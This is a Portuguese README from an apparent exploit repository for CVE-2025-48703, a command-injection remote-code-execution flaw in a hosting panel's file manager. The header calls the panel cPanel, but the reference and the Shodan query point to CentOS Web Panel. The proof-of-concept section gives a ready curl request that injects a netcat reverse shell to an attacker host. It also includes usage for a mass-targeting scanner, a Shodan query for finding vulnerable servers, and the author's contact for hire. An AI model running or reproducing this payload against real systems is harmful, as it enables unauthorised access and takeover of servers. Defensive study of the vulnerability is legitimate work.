CVE-2025-48703 é uma vulnerabilidade de Execução Remota de Código (RCE) no módulo filemanager de um painel de hospedagem web (por exemplo, cPanel). Ocorre devido ao tratamento de entrada não sanitizado na função acc=changePerm, que permite que um atacante injete e execute comandos.# 🛡️ CVE-2025-48703 - Execução Remota de Código (RCE) no File Manager do cPanel
## 📌 Descrição
**CVE-2025-48703** é uma vulnerabilidade de Execução Remota de Código (RCE) no módulo `filemanager` de um painel de hospedagem web (por exemplo, cPanel). Ocorre devido ao **tratamento de entrada não sanitizado** na função `acc=changePerm`, que permite que um atacante injete e execute comandos arbitrários do sistema usando o parâmetro `t_total`.
---
## 🧨 Impacto
Essa vulnerabilidade permite que atacantes:
- Executem comandos arbitrários no servidor alvo.
- Estabeleçam um reverse shell para acesso persistente.
- Potencialmente escalem privilégios ou movam-se lateralmente.
> ⚠️ Este ataque pode ser realizado com autenticação mínima ou, em algumas configurações, com acesso não autenticado.
---
## 🚀 Prova de Conceito (PoC)
### ✅ Comando de Reverse Shell
```bash
curl -kis 'https://<IP_ALVO>:2083/myuser/index.php?module=filemanager&acc=changePerm' --data 'fileName=.bashrc¤tPath=/home/myuser&t_total=`nc <IP_ATACANTE> 4444 -e /bin/bash`'
```
## Uso do scanner
```bash
python3 Exploit.py # Certifique-se de que targets.txt esteja no mesmo diretório
```
## Busca no Shodan
```text
Server: cwpsrv
```
Referência: https://fenrisk.com/rce-centos-webpanel
---
## 💌 Contato
**Caso queira me contatar ou precise de algum serviço, me encontre nas seguintes plataformas:**
**Usuário do Discord: 4wj.**
**Instagram: @glowwz9**
**E-mail: vliyanie1337@proton.me**
[4.0K] /data/pocs/02710a9331134a6e491d5c70ff6fc1f6e71bdc9b
├── [4.0K] CVE-2025-48703
│ ├── [1.2K] Exploit.py
│ └── [ 0] target.txt
└── [1.5K] README.md
2 directories, 3 files